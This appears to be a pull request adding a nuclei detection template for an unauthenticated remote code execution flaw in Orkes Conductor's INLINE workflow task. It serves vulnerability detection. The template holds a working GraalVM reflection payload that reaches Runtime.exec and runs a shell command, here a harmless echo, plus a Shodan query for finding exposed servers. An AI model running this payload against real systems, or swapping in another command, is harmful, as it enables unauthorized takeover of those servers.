### PR TITLE
Add CVE-2026-58138 - Orkes Conductor 3.21.21-3.30.1 Unauthenticated RCE

### DIFF
--- a/http/cves/2026/CVE-2026-58138.yaml
+++ b/http/cves/2026/CVE-2026-58138.yaml
@@ -1,0 +1,89 @@
+id: CVE-2026-58138
+
+info:
+  name: Orkes Conductor 3.21.21-3.30.1 - Remote Code Execution
+  author: aryu-ru
+  severity: critical
+  description: |
+    Orkes Conductor from 3.21.21 before 3.30.2 is vulnerable to unauthenticated remote code execution. The INLINE workflow task evaluates a user-supplied JavaScript expression in a GraalVM context created with HostAccess.ALL, so an unauthenticated attacker can reflect from the bound input object to java.lang.Runtime and execute arbitrary operating system commands through the workflow API.
+  impact: |
+    A remote, unauthenticated attacker can execute arbitrary operating system commands on the Conductor server.
+  remediation: |
+    Upgrade to Orkes Conductor 3.30.2 or later, which disables host class loading in the script evaluators.
+  reference:
+    - https://www.vulncheck.com/advisories/orkes-conductor-unauthenticated-rce-via-graalvm-script-evaluators
+    - https://github.com/conductor-oss/conductor/commit/c691e35e768caeb802c9f06ecdd9674c80081af1
+    - https://github.com/conductor-oss/conductor/releases/tag/v3.30.2
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-58138
+    - https://github.com/BiiTts/CVE-2026-58138-Conductor-Unauth-RCE
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2026-58138
+    cwe-id: CWE-94
+  metadata:
+    verified: true
+    max-request: 3
+    vendor: conductor-oss
+    product: conductor
+    shodan-query: http.title:"Conductor UI"
+  tags: cve,cve2026,conductor,graalvm,rce,unauth,intrusive
+
+variables:
+  wfname: "{{rand_text_alpha(12)}}"
+  marker: "{{rand_text_alphanumeric(8)}}"
+
+flow: http(1) && http(2) && http(3)
+
+http:
+  - raw:
+      - |
+        POST /api/metadata/workflow HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+
+        {"name": "{{wfname}}", "version": 1, "schemaVersion": 2, "ownerEmail": "test@test.com", "tasks": [{"name": "n", "taskReferenceName": "n", "type": "INLINE", "inputParameters": {"evaluatorType": "javascript", "expression": "var k=$.getClass().getClass();var S=k.getMethod('getName').getReturnType();var forName=k.getMethod('forName',S);var L=function(n){return forName.invoke(null,[n]);};var RT=L('java.lang.Runtime');var rt=RT.getMethod('getRuntime').invoke(null,[]);var I=L('java.lang.Integer').getField('TYPE').get(null);var A=L('java.lang.reflect.Array');var arr=A.getMethod('newInstance',k,I).invoke(null,[S,3]);var set=A.getMethod('set',L('java.lang.Object'),I,L('java.lang.Object'));set.invoke(null,[arr,0,'sh']);set.invoke(null,[arr,1,'-c']);set.invoke(null,[arr,2,'echo {{marker}}-$((6*7))']);var p=RT.getMethod('exec',arr.getClass()).invoke(rt,[arr]);p.waitFor();var isr=L('java.io.InputStreamReader').getConstructor(L('java.io.InputStream')).newInstance(p.getInputStream());var br=L('java.io.BufferedReader').getConstructor(L('java.io.Reader')).newInstance(isr);var o='',l;while((l=br.readLine())!==null)o+=l+'\\n';o"} }]}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "status_code == 200"
+        internal: true
+
+  - raw:
+      - |
+        POST /api/workflow/{{wfname}} HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+
+        {}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "status_code == 200"
+        internal: true
+
+    extractors:
+      - type: regex
+        name: wfid
+        internal: true
+        group: 1
+        regex:
+          - "([0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12})"
+
+  - raw:
+      - |
+        GET /api/workflow/{{wfid}}?includeTasks=true HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{marker}}-42"
+
+      - type: status
+        status:
+          - 200

--- a/http/cves/2026/CVE-2026-58138.yaml
+++ b/http/cves/2026/CVE-2026-58138.yaml
@@ -27,7 +27,7 @@ info:
     vendor: conductor-oss
     product: conductor
     shodan-query: http.title:"Conductor UI"
-  tags: cve,cve2026,conductor,graalvm,rce,unauth,intrusive
+  tags: cve,cve2026,conductor,graalvm,rce,intrusive
 
 variables:
   wfname: "{{rand_text_alpha(12)}}"
@@ -83,6 +83,11 @@ http:
         part: body
         words:
           - "{{marker}}-42"
+
+      - type: word
+        part: content_type
+        words:
+          - application/json
 
       - type: status
         status:


### PR DESCRIPTION
### PR Information

Added **CVE-2026-58138** — Orkes/OSS Conductor `3.21.21` before `3.30.2` unauthenticated remote code execution.

Conductor's `INLINE` workflow task evaluates a user-supplied JavaScript expression in a GraalVM context built with `Context.newBuilder("js").allowHostAccess(HostAccess.ALL)`. Because the community API is unauthenticated by default, an attacker can register a workflow whose `INLINE` task reflects from the bound input object (`$`) up to `java.lang.Class.forName` → `java.lang.Runtime.exec`, achieving arbitrary OS command execution without authentication. Fixed in 3.30.2 by disabling host class loading in the script evaluators.

The template runs a **non-destructive** probe: the injected command is `echo <marker>-$((6*7))`, and the matcher requires the shell-computed output `<marker>-42` to appear in the workflow's `outputData.result`. The `-42` is produced by the target shell (not reflected input), so a patched host — where the reflection is blocked — cannot satisfy the matcher.

Detection flow (`flow: http(1) && http(2) && http(3)`, unauthenticated):
1. `POST /api/metadata/workflow` — register a workflow with a random name and one `INLINE` javascript task.
2. `POST /api/workflow/{name}` — start it (`INLINE` evaluates synchronously); extract the returned execution UUID.
3. `GET /api/workflow/{id}?includeTasks=true` — match the executed marker `{{marker}}-42` in the task output.

- **CVE:** CVE-2026-58138
- **CWE:** CWE-94 (Improper Control of Generation of Code)
- **CVSS:3.1:** 9.8 (`CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`) — critical
- **References:**
  - https://www.vulncheck.com/advisories/orkes-conductor-unauthenticated-rce-via-graalvm-script-evaluators
  - https://github.com/conductor-oss/conductor/commit/c691e35e768caeb802c9f06ecdd9674c80081af1
  - https://github.com/conductor-oss/conductor/releases/tag/v3.30.2
  - https://nvd.nist.gov/vuln/detail/CVE-2026-58138
  - https://github.com/BiiTts/CVE-2026-58138-Conductor-Unauth-RCE (PoC + docker lab)

### Template validation

- [x] Validated with a host running a vulnerable version and/or configuration (True Positive)
- [x] Validated with a host running a patched version and/or configuration (avoid False Positive)

#### Additional Details

Validated against the official Docker images with `nuclei -validate` passing and `yamllint` (repo config) clean.

**True Positive — vulnerable `conductoross/conductor:3.22.3`:**

```
$ nuclei -t http/cves/2026/CVE-2026-58138.yaml -u http://<lab>:8080
[CVE-2026-58138] [http] [critical] http://<lab>:8080/api/workflow/8cfa8f48-...-d5657a993e51?includeTasks=true
[INF] Scan completed in 48ms. 1 matches found.
```

The final response confirms command execution by the target:

```json
"status": "COMPLETED",
"tasks": [{ "taskType": "INLINE", "status": "COMPLETED",
            "outputData": { "result": "s8dtqrZo-42\n" } }]
```

The benign probe `echo s8dtqrZo-$((6*7))` returned `s8dtqrZo-42` — the `-42` is computed by the target's `/bin/sh`, proving OS command execution (root, in the lab image).

**True Negative — patched `conductoross/conductor:3.30.2`:**

```
$ nuclei -t http/cves/2026/CVE-2026-58138.yaml -u http://<lab>:8080
[INF] Scan completed in 283ms. 0 matches found.
```

On the patched build the `INLINE` task returns `FAILED_WITH_TERMINAL_ERROR` — `TypeError: ... Unknown identifier: getMethod` (host class loading disabled), so the marker output never appears and the template does not match. No false positive.

Reproduce the vulnerable lab in one command:

```
# lab/docker-compose.yml
services:
  conductor:
    image: conductoross/conductor:3.22.3
    network_mode: host   # community API on :8080, unauthenticated by default
```

**Reviewer notes**
- Tagged `intrusive`: the template registers a randomly-named workflow definition and one execution on the target (a benign, non-destructive state write). The injected command is a harmless `echo` — no `Runtime.exec` of destructive commands, no file writes.
- Novelty: no existing template covers this. The repo's `netflix-conductor-ui` / `netflix-conductor-version` templates only fingerprint the panel/version; none exercise task evaluation. `grep -r CVE-2026-58138` returns nothing.
- The random `{{marker}}` plus the shell-computed `-42` make the matcher self-verifying and false-positive-resistant.

### Additional References:

- [Nuclei Template Creation Guideline](https://docs.projectdiscovery.io/templates/introduction)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)
